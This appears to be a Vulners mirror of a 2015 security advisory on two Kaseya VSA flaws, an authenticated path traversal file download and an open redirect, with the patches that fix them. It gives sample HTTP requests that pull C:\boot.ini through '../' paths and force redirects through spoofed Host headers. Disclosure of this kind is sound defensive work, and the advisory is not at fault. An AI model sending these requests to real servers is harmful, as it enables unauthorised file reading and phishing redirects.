Vulners
Lucene search
Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Last Week’s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers | 11 Jul 202120:52 | – | avleonov |
 | CVE-2015-2863 | 27 Oct 202400:00 | – | circl |
 | Kaseya Virtual System Administrator Directory Traversal Vulnerability | 22 Jul 201500:00 | – | cnvd |
| Kaseya Virtual System Administrator Open Redirect Vulnerability | 22 Jul 201500:00 | – | cnvd |
 | CVE-2015-2862 | 20 Jul 201523:00 | – | cve |
| CVE-2015-2863 | 20 Jul 201523:00 | – | cve |
 | CVE-2015-2862 | 20 Jul 201523:00 | – | cvelist |
| CVE-2015-2863 | 20 Jul 201523:00 | – | cvelist |
 | Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1) | 15 Jul 201500:00 | – | exploitdb |
 | EUVD-2015-2950 | 7 Oct 202500:30 | – | euvd |
10
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."
A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.
>> Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).
#2
Vulnerability: Open redirect (unauthenticated)
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)
>> Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
>> References:
[1] https://www.kb.cert.org/vuls/id/919604
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jul 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.49035